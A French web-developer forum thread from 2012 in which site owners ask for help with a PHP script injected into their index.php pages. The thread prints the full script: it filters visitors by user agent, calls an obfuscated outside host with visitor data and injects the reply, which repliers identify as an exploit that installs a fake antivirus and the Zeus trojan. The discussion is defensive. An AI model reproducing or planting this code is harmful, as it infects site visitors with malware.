Injection de code dans mes pages

Bonjour,
je viens de me rendre compte qu'un script php a été ajouté à mes pages je ne sais ni par qui ni comment mais ce n'est pas par moi, mon site est hébergé par easy-hebergement, je les ai contacté par mail pour leur en faire part, j’attends de leurs nouvelles, voici le script rajouté mais qui ne me dis rien qui vaille :

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( 'aHR0cDovL2JvdHN0YXRpc3RpY3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink ); 
    }
    } 
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 12);
    $sResult = @curl_exec($stCurlHandle); 
    if ($sResult[0]=="O") 
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle); 
}
}
?>

En gros ce code fournit a un site (http://botstatisticupdate.com) des statistiques d'utilisation de ton site par des bots en dehors de ceux reconnus comme google, enfin c'est ce que ce script est censé faire, la détection des user-agent semblant être un peu simpliste et inefficace.

salut kustologic,
je ne sais pas ce qu'est censé faire ce script, je sais que ce n'est pas moi qui l'ai mis et qu'il ralentit un max l'affichage de mes pages, j'ai fait une recherche sur mon ami google avec ceci :

This code use for global bot statistic

la première ligne commentée et les résultats ne sont pas des plus sympas, il semblerais que ce code s'inscrit sur toutes mes pages index.php, je ne sais pas si c'est un hasard mais depuis je suis régulièrement embête par un SecurityShield et un autre du même style, les deux sont peut-être liés

Et bien il faut:

#1 virer le code

#2 identifier la faille de sécurité qui a permis cela.

// ps en fait il ajoute des liens, dans certains cas.
Modifié par kustolovic (30 Mar 2012 - 10:08)

le code a été viré, bien évidement, mais il est revenu, donc faut comme tu le dis identifier la faille de sécurité et la ça va être beaucoup plus compliqué pour moi ! la j'ai rapatrié tout mon site en local et je fais un grand nettoyage

kustolovic a écrit :
En gros ce code fournit a un site (http://botstatisticupdate.com) des statistiques d'utilisation de ton site par des bots en dehors de ceux reconnus comme google, enfin c'est ce que ce script est censé faire, la détection des user-agent semblant être un peu simpliste et inefficace.

C'est pas du tout ce que ce code fait. Il teste si le visiteur est un bot connu (ou cetains navigateurs), si ce n'est pas le cas il importe un exploit en JavaScript dans la page qui déclenche l'installation d'un virus, désactive le centre de sécurité et le gestionnaire de tache.

Le virus ressemble à un faux antivirus (Smart Fortress 2012) et lance un faux scan du PC et de faux messages d'alertes. Je suis pas allé plus loin.

Un conseil : supprimer le code sans attendre.
Modifié par jb_gfx (30 Mar 2012 - 10:37)

Ton site est-il programmé à la main, est-ce un CMS?

As-tu une adresse?

@jb_gfx, en effet J'étais allé trop vite en lisant en diagonale...
Modifié par kustolovic (30 Mar 2012 - 10:37)

Ah tiens, en bonus il installe le trojan Zbot/Zeus en fond.
Modifié par jb_gfx (30 Mar 2012 - 10:45)

oui, Smart Fortress 2012 c'est bien la saleté qui s'incruste sur mon pc depuis quelques temps, je le vire mais il revient à chaque fois actuellement sous un autre nom, alors, pour mon site c'est fait à la main mais n'étant pas un expert j'ai pioché par ci par là, depuis ce matin vu les soucis que j'ai j'ai laissé que la page d'accueil disponible, mais si tu le veux je peux remettre les autres pages en ligne, voici l'adresse de mon site : ---http://www.pascalhome.fr
Modifié par Tony Monast (30 Mar 2012 - 22:40)

padymen a écrit :
oui, Smart Fortress 2012 c'est bien la saleté qui s'incruste sur mon pc

Ok si ton PC à été infecté il y a de grande chance que tu ais aussi Zeus/Zbot sur ta machine. Tu devrais lancer un scan complet parce qu'autant Smart Fortress c'est bidon autant Zeus c'est vraiment dangereux.

salut jb_gfx ben à chaque fois que je me rend compte que ce satané smart fortress est la, je nettoie complet avec malwarebytes un scan antivirus complet et avant tout chose un nettoyage des fichiers temp etc, mais comme je me suis offert il y a quelque mois driveclone, je pense que je vais juste me réinstaller l'image de départ de mon p'tit Windows

padymen a écrit :
salut jb_gfx ben à chaque fois que je me rend compte que ce satané smart fortress est la, je nettoie complet avec malwarebytes un scan antivirus complet et avant tout chose un nettoyage des fichiers temp etc, mais comme je me suis offert il y a quelque mois driveclone, je pense que je vais juste me réinstaller l'image de départ de mon p'tit Windows

Restauration système à une date précédent l'infection ça suffit dans 99% des cas. Cela dit quelque chose me dit qu'il revient quand tu visites ton site.
Modifié par jb_gfx (30 Mar 2012 - 10:57)

lol, comme mon site me sert en quelques sorte d'annuaire pour les sites que je visite régulièrement, il doit revenir très souvent !

Bonjour a tous,

Désolé de déterrer ce topic, mais c'est exactement le code que j'ai retrouvé ce matin dans mon index.php, et ce n'est pas la première fois.

Il n'y est plus bien évidemment mais j'aimerais savoir comment il y est arrivé, et la on va dire que je sèche un peu.

Pour info: le site en question est ici, totalement codé a la main par moi même, donc surement pas parfait . J'utilise une base de donnée seulement pour la grille tarifaire et un peut de js pour les cartes Google.

Merci d'avance de vos lumières